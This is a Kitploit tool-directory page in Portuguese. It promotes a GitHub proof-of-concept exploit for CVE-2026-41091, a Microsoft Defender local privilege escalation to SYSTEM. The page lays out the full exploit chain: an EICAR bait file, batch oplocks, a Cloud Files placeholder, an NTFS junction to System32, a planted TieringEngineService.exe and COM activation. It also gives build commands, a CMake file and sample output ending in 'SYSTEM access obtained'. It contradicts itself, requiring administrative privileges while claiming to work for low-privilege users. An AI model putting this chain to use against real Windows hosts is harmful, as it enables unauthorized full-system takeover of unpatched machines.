Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41091-PoC-Exploit — CVE-2026-41091 RedSun | Exploit de LPE do Microsoft Defender. Utilizadores de baixo privilégio obtêm NT AUTHORITY\SYSTEM 🔥 através da Cloud Files API + truques com NTFS junctions. Força o Defender a escrever payloads maliciosos em System32 com direitos de SYSTEM. ⚠️ Explorado ativamente na natureza. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. 🛡️ Apenas PoC educacional. | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-41091-poc-exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de Binários
GitHubtc4dy/cve-2026-41091-poc-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

CVE-2026-41091-PoC-Exploit

Ver Repositório
3há 1 mêsAinda não revisado

CVE-2026-41091 RedSun | Exploit de LPE do Microsoft Defender. Utilizadores de baixo privilégio obtêm NT AUTHORITY\SYSTEM 🔥 através da Cloud Files API + truques com NTFS junctions. Força o Defender a escrever payloads maliciosos em System32 com direitos de SYSTEM. ⚠️ Explorado ativamente na natureza. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. 🛡️ Apenas PoC educacional.

Compartilhar

SolarFlare

☀️ CVE-2026-41091 - RedSun (SolarFlare) - Exploit de LPE do Microsoft Defender

C++ Windows License CVSS CISA KEV

Vulnerabilidade de Seguimento de Links do Microsoft Defender - Escalação de Privilégio Local para NT AUTHORITY\SYSTEM

A vulnerabilidade é conhecida como "RedSun" 🎯, e "SolarFlare" é o nome que dei ao meu exploit. ✅

📌 Visão Geral

Este repositório contém um exploit de Prova de Conceito (PoC) totalmente funcional para a CVE-2026-41091, uma vulnerabilidade crítica de escalação de privilégio local no Microsoft Defender (Microsoft Malware Protection Engine). Ao explorar a resolução inadequada de links (CWE-59), um atacante autenticado com privilégios baixos pode obter privilégios de NT AUTHORITY\SYSTEM.

A vulnerabilidade, também conhecida como "RedSun" ou "SolarFlare", permite que atacantes enganem o Microsoft Defender para que ele grave arquivos arbitrários em locais protegidos do sistema com privilégios de SYSTEM, usando a API Cloud Files (CfAPI) e pontos de junction do NTFS.

Nota: Este repositório inclui duas versões:

  • basic_poc.cpp - Demonstração simplificada do algoritmo (educacional)
  • full_poc.cpp - Exploit completo e funcional com todos os recursos

🔥 Principais Recursos

🎯 Detalhes da Vulnerabilidade

📦 Produtos Afetados

ProdutoVersões AfetadasVersões Corrigidas
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

🔬 Cadeia do Exploit

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE EXPLOIT CHAIN                                                    │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│ 1. Create Working Directory                                                 │
│    └─> %TEMP%\SF-XXXX\                                                      │
│                                                                              │
│ 2. Trigger Defender with EICAR                                              │
│    └─> Write reversed EICAR to bait file                                    │
│                                                                              │
│ 3. Wait for VSS Snapshot                                                    │
│    └─> Detect Volume Shadow Copy creation                                   │
│                                                                              │
│ 4. Create First Batch Oplock                                                │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on bait file                              │
│                                                                              │
│ 5. Wait for Oplock Break                                                    │
│    └─> Acquire exclusive access                                             │
│                                                                              │
│ 6. Rename Directory                                                         │
│    └─> Move original directory to .tmp                                      │
│                                                                              │
│ 7. Register Cloud Sync Root                                                 │
│    └─> CfRegisterSyncRoot with Cloud Files API                              │
│                                                                              │
│ 8. Create Cloud Placeholder                                                 │
│    └─> CfCreatePlaceholders for bait file                                   │
│                                                                              │
│ 9. Create Second Batch Oplock                                               │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder                      │
│                                                                              │
│ 10. Wait for Second Oplock Break                                            │
│     └─> Acquire exclusive access                                            │
│                                                                              │
│ 11. Rename Cloud Directory                                                  │
│     └─> Move cloud directory to .cloud.tmp                                  │
│                                                                              │
│ 12. Create NTFS Junction to System32                                        │
│     └─> Redirect to C:\Windows\System32                                     │
│                                                                              │
│ 13. Copy Payload to System32                                                │
│     └─> Copy bait file to System32 as TieringEngineService.exe              │
│                                                                              │
│ 14. Activate Service as SYSTEM                                              │
│     └─> CoCreateInstance(StorageTiersManagement)                            │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

📦 Instalação

Pré-requisitos

  • Windows 10/11 ou Windows Server 2019/2022
  • Visual Studio 2019/2022 com ferramentas C++
  • Privilégios administrativos (para execução)

Compilação

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Build using Visual Studio Developer Command Prompt
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Or build basic version
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

🛠️ Uso

Exploit Completo (Escalação de Privilégio para SYSTEM)

root@kitploit:~
full_poc.exe

Demonstração Básica do Algoritmo

root@kitploit:~
basic_poc.exe

📋 Exemplo de Saída

Saída do Exploit Completo

root@kitploit:~
CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM

[+] SYSTEM access obtained!

Saída do PoC Básico

root@kitploit:~
CVE-2026-41091 Basic PoC
========================================
  Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe

[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.

🔧 Instruções de Compilação

Usando o Visual Studio

  1. Abra o Prompt de Comando do Desenvolvedor para VS 2022
  2. Navegue até o diretório do exploit
  3. Execute:
root@kitploit:~
# Full exploit
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Basic PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

Usando o CMake

root@kitploit:~
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ Requisitos e Limitações

🔗 Exploits Relacionados

Confira meus outros repositórios de exploits:

  • CVE-2026-24061-PoC-Exploit - Bypass de autenticação do GNU inetutils-telnetd
  • CVE-2026-41940-PoC-Exploit - Exploit de bypass de autenticação do cPanel/WHM
  • CVE-2026-0073-PoC-Exploit - Bypass de autenticação da depuração sem fio ADB do Android
Baixar ferramenta
CategoriaRecursos
Exploração✅ Escalação de privilégio local para SYSTEM
✅ Integração com a API Cloud Files (CfAPI)
✅ Criação de placeholder na nuvem
✅ Redirecionamento por junction NTFS
Técnicas✅ Abuso de oplocks em lote
✅ Detecção de snapshot VSS
✅ Gatilho EICAR
✅ Ativação de serviço COM
Alvo✅ Microsoft Defender < 1.1.26040.8
✅ Windows 10/11
✅ Windows Server 2019/2022
Usabilidade✅ Registro de logs detalhado
✅ Tratamento de erros
✅ Nomes de diretório aleatórios
✅ Limpeza automática
AtributoValor
ID CVECVE-2026-41091
Pontuação CVSS7.8 (Alta)
Vetor CVSSAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Vetor de AtaqueLocal
Privilégios NecessáriosBaixos
Interação do UsuárioNenhuma
ImpactoExecução de código em nível de SYSTEM
CISA KEV✅ Sim (explorada ativamente na natureza)
Patch DisponívelMicrosoft Malware Protection Engine 1.1.26040.8
RequisitoDetalhes
SOWindows 10/11, Server 2019/2022
PrivilégiosAdministrativos (para execução)
DefenderO Microsoft Defender deve estar habilitado
InternetNecessária para a detecção de snapshot VSS
PatchFunciona apenas em sistemas sem patch
ArquiteturaSomente x64